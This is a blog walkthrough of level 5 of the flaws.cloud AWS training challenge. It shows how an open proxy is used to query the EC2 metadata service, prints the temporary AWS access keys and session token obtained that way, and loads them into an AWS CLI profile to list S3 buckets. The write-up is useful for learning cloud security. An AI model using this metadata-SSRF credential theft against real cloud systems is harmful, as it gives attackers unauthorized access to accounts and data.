flaws.cloud walkthrough | AWS penetration testing — Level-5

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/

http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

So, Well, I tried to access the /proxy/169.254.169.254/ to get the meta data, I was able to browse to a lot of hidden folders and sub folders.

One of them looked to juicy.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Access Key Id : ASIA6GG7PSQG6KEM6E7Z
Secret Access Key : NGMKgOhkI8D3jRu7dCYDepbXWD2hFsO3bQtkp1Ha

Also, One more URL,

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

AccessKeyId: ASIA6GG7PSQGX6E6CVXK
SecretAccessKey : f05WRER50vm160b87ar+wJnoVxz1O9gv+nD/CTVg
"IQoJb3JpZ2luX2VjEBkaCXVzLXdlc3QtMiJIMEYCIQD0vQGHfRTfbhYS45RXeS2qHgvcHqBfMHCUsVxVIliGJAIhAIC6U+3FVK4nLsGOCrxdySdmIXd7Bwl4OrDWB7PUpEEkKvoDCBIQAhoMOTc1NDI2MjYyMDI5IgyD2M/YMtmQ3wM33EQq1wNGB/xjwP31JRwz9LXBLugsaMYAwilFoshDoC2R9IXXQeuS6jJGQ4AwrLSnsFdCVT92TFe1bI+WDcAN/+ucF4ehCwgPQ4vcszfjaLmsINsgSlC6rVw8s0Mp0FTc4PcR9wMbb28l5a1wLa3d7/MgoUVLjw4/ayVz1c6Huur6ege693jRoFTbaMC73V91uDiQoRkAQWjAhWF7EG/G5cpYKCFgRfSLc2dz4tKAqYytLyzovrvI+bZRjALEDBXiUVMywJ/W0Yn+LVVPzHeNg+fDnC51FKfGbljBnycDnBIQPO319jq2IQDD+p8ebmATfCqTw4DsAEUYtY9JCgWU8nLGMYZFm8g2gzU631anypF+tBu81wqGFdDD8ahjrg5l9mrmlJUhQbFg1w91UbsDy2iUlYzeT+F5ug+oy2rtehSiD5FH1Uc9qGpoom2ewEMYZUcMhLjnUxQHJOuKBmsqGbil7ZkiRPKETMq9S664e3IrptNRgJAfEU109wFivm9MmW9nXXmRin70R6/fXkbVOB/GPFpM6dwYyO0pQ+ZZjFqzB+brkObeuViZCYQpOOONiEWjNBrAbEIg9hxsvrbh/Wnr0Z+sNau9r1wb3cSbt0fwY2zPpxksTH9H4Vgwp6+GjgY6pAHg5VVUCv79+DLvnRhwfZSzYseXtZSfo14HhSjpvX91AFrIxO+oUjrHapojQ22HeV60QJf7ij0k2W2cZsHORGiIQqU2WHyYZG1j7/pJNsCKC+0uBCu65UsiZmOI3BGgztWK9bIPnOxQgaTMIRp80y1u5flfZPjAFe2/gQv1PcbMCbnrwnKwoWhurGI3o2gDAtaEFy/QkdcqCeou4mT+M0spokh26Q==",
"Expiration" : "2021-12-21T15:22:46Z"

Now after the configure profile command from the aws-shell

Command: aws configure — profile level3

Now, from the .aws folder in the user/(youruser)/.aws directory edit the credentials file and add the aws_sesssion_token = the token you just got above.

Now let’s try to see the s3 buckets.

Now, just copy the directory ddcc78ff/ and append it after the level 6 URL.

Bingo We’re at level 6

--

--

--

Security researcher, Blogger, Bug Bounty hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Insider Threat at Twitter Is a Risk to Everyone

Twitter logo and binary code. Photo by Dado Ruvic/Reuters

{UPDATE} Найди СЛОВО на русском Hack Free Resources Generator

A virtual goldmine: Why criminals target patient data (Part 2)

{UPDATE} Upp i Rök Hack Free Resources Generator

Moving Fast with Security

{UPDATE} Pocket DJ Simulator Hack Free Resources Generator

Response to draft Guidance on Age-Verification Arrangements and draft Guidance on Ancillary Service…

First Look Inside the Colorado Privacy Act

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kapil Verma

Kapil Verma

Security researcher, Blogger, Bug Bounty hunter

More from Medium

LLMNR and NetBIOS Poisoning

Provision a Bitbucket SmartMirror Instance using AWS CloudFormation

The First Queue Bypass Method I Found for Footlocker.com

ANNOUNCING THINKIUMS BUG BOUNTY